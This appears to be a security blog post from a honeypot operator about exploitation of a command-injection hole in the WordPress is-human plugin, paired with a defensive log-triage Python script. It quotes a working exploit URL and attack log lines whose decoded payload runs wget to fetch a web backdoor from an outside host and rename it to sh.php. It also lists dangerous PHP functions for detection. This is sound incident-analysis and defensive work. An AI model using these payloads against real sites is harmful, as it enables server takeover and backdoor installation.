As we first noted in a previous Honeypot Alert blog post, our web honeypots have again received attempts to exploit a remote command injection vulnerability in the WordPress is-human plugin. ExploitDB lists the following data:
# Exploit Title: is-human (1.4.2 and prior) WordPress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run our own code.
In order to avoid any errors we point the $is_hum->get_* array variable to $is_hum->get_ih, and to close the execution without error we point it to the PHP function error_log(). In between we may place our own PHP code and use the passthru() function to execute commands.
Execution running the Linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error
Here are the attacks we picked up:
178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:42 +0000] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 301 765 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
As you can see, the attacker is injecting PHP eval() and base64_decode() calls into the vulnerable "type" parameter of the is-human WordPress plugin. The base64 wrapper hides the actual command from a casual look at the log, and from signatures that only match on strings such as passthru or wget. Decoding the base64 string yields the following PHP:
passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');
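To make the two steps above concrete (locating the injected "type" value and peeling off the base64 wrapper to see the real command), here is a small log triage script. It is an added example for this post, not code from the is-human plugin or from the exploit author. Its sample log lines are constructed: the first mirrors the honeypot hits above, the second is a benign request with a plain identifier, and the third nests two base64 layers, a variant we did not see in the honeypot. The reconstructed eval string `$is_hum->get_<type>_log();` is inferred from the ExploitDB description (the `$is_hum->get_` prefix and the `error` + `_log()` suffix) and is an assumption, not the plugin's actual source.

```python
"""Pull is-human 'type' payloads out of Apache access-log lines and peel the
base64 wrapper so the real command is visible. Added example, not plugin code."""
import base64
import re
from urllib.parse import unquote, urlsplit

# Apache combined-log prefix: client, ident, user, [time], "METHOD path PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# base64_decode(...) with or without quotes around the argument, as in the hits above
B64_CALL_RE = re.compile(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)")

# A benign 'type' is a bare identifier fragment; anything else breaks out of the eval'd statement
SAFE_TYPE_RE = re.compile(r"^[A-Za-z0-9_]*$")

# Command-execution functions worth reporting when they appear in any decoded layer
DANGEROUS = ("assert", "eval", "exec", "passthru", "popen", "shell_exec", "system")

# Constructed sample log. Line 1 mirrors the honeypot hits; line 2 is a benign
# request with a plain identifier; line 3 wraps passthru('id') in two base64
# layers (a constructed variant, not something seen in the honeypot).
_inner = base64.b64encode(b"passthru('id');").decode()
_outer = base64.b64encode(f"eval(base64_decode({_inner}));".encode()).decode()
SAMPLE_LOG = [
    '178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '10.0.0.5 - - [12/Mar/2012:11:20:01 +0000] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [12/Mar/2012:11:25:13 +0000] "GET /blog/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode({_outer}));error HTTP/1.1" 404 568 "-" "Mozilla/5.0"',
]


def parse_query(query):
    """Split on '&' only, the way PHP does, so the ';' inside the payload survives."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def peel_base64(code, max_depth=5):
    """Decode nested base64_decode(...) layers; returns [original, layer1, ..., innermost]."""
    layers = [code]
    for _ in range(max_depth):
        match = B64_CALL_RE.search(layers[-1])
        if not match:
            break
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: not real base64, stop peeling
            break
        layers.append(decoded)
    return layers


def analyze_line(line):
    """Return a finding for an is-human log-reset request, or None for anything else."""
    match = LOG_RE.match(line)
    if not match:
        return None
    client, when, _method, path, status = match.groups()
    url = urlsplit(path)
    if not url.path.endswith("/is-human/engine.php"):
        return None
    params = parse_query(url.query)
    if params.get("action") != "log-reset":
        return None
    type_value = params.get("type", "")
    layers = peel_base64(type_value)
    blob = " ".join(layers)
    return {
        "client": client,
        "time": when,
        "status": int(status),
        "type": type_value,
        # Assumed shape of the eval'd statement, reconstructed from the exploit text
        "eval_string": "$is_hum->get_" + type_value + "_log();",
        "injection": not SAFE_TYPE_RE.match(type_value),
        "decoded_payload": layers[-1] if len(layers) > 1 else None,
        "dangerous_calls": sorted(fn for fn in DANGEROUS if re.search(rf"\b{fn}\s*\(", blob)),
    }


def scan(lines):
    """Findings for every line whose 'type' value cannot be a plain identifier."""
    return [f for f in (analyze_line(line) for line in lines) if f and f["injection"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["time"], finding["status"],
              finding["dangerous_calls"], "->", finding["decoded_payload"] or finding["type"])
```

Running it over a real access log is `scan(open("access.log"))`. The detection does not depend on the base64 decoding succeeding: any "type" value that is not a bare identifier is flagged, because that is exactly the condition under which the attacker escapes the eval'd statement, and the decoding is only there to tell the analyst what the payload would have done. The same identifier check is the rule a WAF or a patched engine.php should enforce before the value ever reaches eval().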
This uses the OS-level wget HTTP client to download the file sh.txt from the remote host, then renames it to sh.php so that the web server will execute it as PHP. None of the requests above reached a vulnerable engine.php on our honeypot, which does not run the plugin, hence the 404 and 301 responses. Here is a snippet of the code:
When sh.php is executed by PHP, it presents a common web backdoor page, such as the one in the following screenshot, which was taken from Google search results for other compromised hosts.